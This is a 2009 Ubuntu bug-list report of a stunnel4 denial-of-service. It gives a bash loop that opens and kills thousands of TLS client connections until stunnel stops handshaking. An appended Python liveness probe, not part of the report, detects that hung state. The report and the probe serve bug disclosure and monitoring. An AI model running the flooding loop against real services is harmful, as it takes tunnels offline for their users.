[Bug 327222] [NEW] Simple stunnel DOS when opening and closing connections

Roman Fiedler roman.fiedler at arcsmed.at
Mon Feb 9 15:36:55 UTC 2009


Public bug reported:

Binary package hint: stunnel4

Usually the stunnel4 main process (the one with the lowest PID) consumes
100% of CPU; TCP connections are accepted, but the SSL handshake is not
started. The test scenario below will run 10000 tests, but usually the test
can be stopped after 500-1000 tests, since stunnel is broken by then.

stunnel4 on hardy x86:
Description:    Ubuntu 8.04.2
Release:        8.04

# apt-cache policy stunnel4
stunnel4:
  Installed: 3:4.21-1
  Candidate: 3:4.21-1
  Version table:
 *** 3:4.21-1 0
        500 http://security.ubuntu.com hardy/universe Packages
        100 /var/lib/dpkg/status


# stunnel4 -version
stunnel 4.21 on i486-pc-linux-gnu with OpenSSL 0.9.8g 19 Oct 2007
Threading:PTHREAD SSL:ENGINE Sockets:POLL,IPv6 Auth:LIBWRAP

Global options
debug           = 5
pid             = /var/run/stunnel4.pid
RNDbytes        = 64
RNDfile         = /dev/urandom
RNDoverwrite    = yes
 
Service-level options
cert            = /etc/stunnel/stunnel.pem
ciphers         = AES:ALL:!aNULL:!eNULL:+RC4:@STRENGTH
key             = /etc/stunnel/stunnel.pem
session         = 300 seconds
sslVersion      = SSLv3 for client, all for server
TIMEOUTbusy     = 300 seconds
TIMEOUTclose    = 60 seconds
TIMEOUTconnect  = 10 seconds
TIMEOUTidle     = 43200 seconds
verify          = none


Test Scenario:

* Generate keys:

openssl req -new -newkey rsa:1024 -nodes -keyout server.key -days 3653 -x509 -out server.cert -subj "/CN=server"
openssl req -new -newkey rsa:1024 -nodes -keyout client.key -days 3653 -x509 -out client.cert -subj "/CN=client"

* Create config:

service = test tunnel
foreground = yes
# Debug warnings only
debug = 4

pid = /home/[username]/tmp/tunnel/tunnel.pid

cert = server.cert
key = server.key
verify = 3

[testany]
accept = 1234
exec = /home/[username]/tmp/tunnel/testcmd.sh
execargs = testcmd.sh
CAfile = client.cert

* Create testcmd.sh script:

#!/bin/bash
cat >> /tmp/dump

* Start tunnel in one shell

stunnel4 tunnel.cfg

* Start testscript in other:

#!/bin/bash
# Open 10000 TLS connections to the tunnel in the background, then kill
# all the clients at once; stunnel usually hangs after 500-1000 of them.
procCount=0
while [ "${procCount}" -lt 10000 ] ; do
  openssl s_client -key client.key -cert client.cert -connect localhost:1234 < /dev/null > /dev/null 2>&1 &
  procCount=$((procCount + 1))
  # progress report every 100 connections
  if [ $((procCount % 100)) -eq 0 ] ; then
    echo "Test: ${procCount}"
  fi
done
pkill -KILL -f "openssl s_client"

* When dead:

openssl s_client -key client.key -cert client.cert -connect localhost:1234
CONNECTED(00000003)

But no handshake

** Affects: stunnel4 (Ubuntu)
     Importance: Undecided
         Status: New

-- 
Simple stunnel DOS when opening and closing connections
https://bugs.launchpad.net/bugs/327222
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.

-- 
ubuntu-bugs mailing list
ubuntu-bugs at lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
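As an added example that is not part of the bug report: a small Python probe that tells the state described above (TCP connection accepted, but no SSL handshake ever starts) apart from a refused connection, a non-TLS answer and a healthy handshake, so a monitor can alert on a hung tunnel that a plain TCP port check would report as up. The certificate is deliberately not verified, because the tunnel in the report uses a self-signed cert and the probe only cares whether a handshake happens at all. The start_fake_listener and free_port helpers are constructed stand-ins (a listener that accepts and stays silent, like the hung stunnel) used to exercise the probe offline; they are not part of stunnel or of the report.

```python
#!/usr/bin/env python3
"""Liveness probe for a TLS endpoint such as the stunnel tunnel above.

Added example, not code from the bug report: it distinguishes the
"TCP accepted but no handshake" state from a refused connection, a
failed negotiation and a healthy handshake.
"""
import socket
import ssl
import sys
import threading

REFUSED = "refused"                    # nothing listening / connect failed
NO_HANDSHAKE = "no-handshake"          # TCP accepted, no ServerHello in time
HANDSHAKE_FAILED = "handshake-failed"  # peer answered, but not with valid TLS
OK = "ok"                              # handshake completed


def probe_tls(host, port, timeout=3.0):
    """Classify host:port as one of the constants above."""
    # No certificate verification: the report's tunnel is self-signed and
    # this probe only asks whether the server starts a handshake at all.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    try:
        raw = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return REFUSED
    with raw:
        raw.settimeout(timeout)
        try:
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                return OK if tls.version() else HANDSHAKE_FAILED
        except socket.timeout:
            # Same symptom as "CONNECTED(00000003)" followed by silence.
            return NO_HANDSHAKE
        except (ssl.SSLError, OSError):
            return HANDSHAKE_FAILED


def start_fake_listener(reply=b"", host="127.0.0.1"):
    """Accept TCP connections and send only `reply` (default: nothing).

    Constructed stand-in for the hung stunnel (reply=b"") or for a
    non-TLS service answering on the port. Returns (port, stop), where
    stop() shuts the listener down and closes the held connections.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(16)
    srv.settimeout(0.2)
    stop = threading.Event()
    held = []

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            if reply:
                conn.sendall(reply)
            held.append(conn)  # keep the connection open, like the hung stunnel
        for conn in held:
            conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], stop.set


def free_port(host="127.0.0.1"):
    """Return a port with nothing listening on it (for the REFUSED case)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    # usage: probe_tls.py localhost 1234   (exit status 0 only when healthy)
    target_host, target_port = sys.argv[1], int(sys.argv[2])
    state = probe_tls(target_host, target_port)
    print(f"{target_host}:{target_port} {state}")
    sys.exit(0 if state == OK else 1)
```

Run against the tunnel from the report with "probe_tls.py localhost 1234": a healthy tunnel prints "ok", a tunnel in the state described above prints "no-handshake" after the timeout instead of hanging like s_client does, and the non-zero exit status can drive a monitoring check or an automatic restart.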



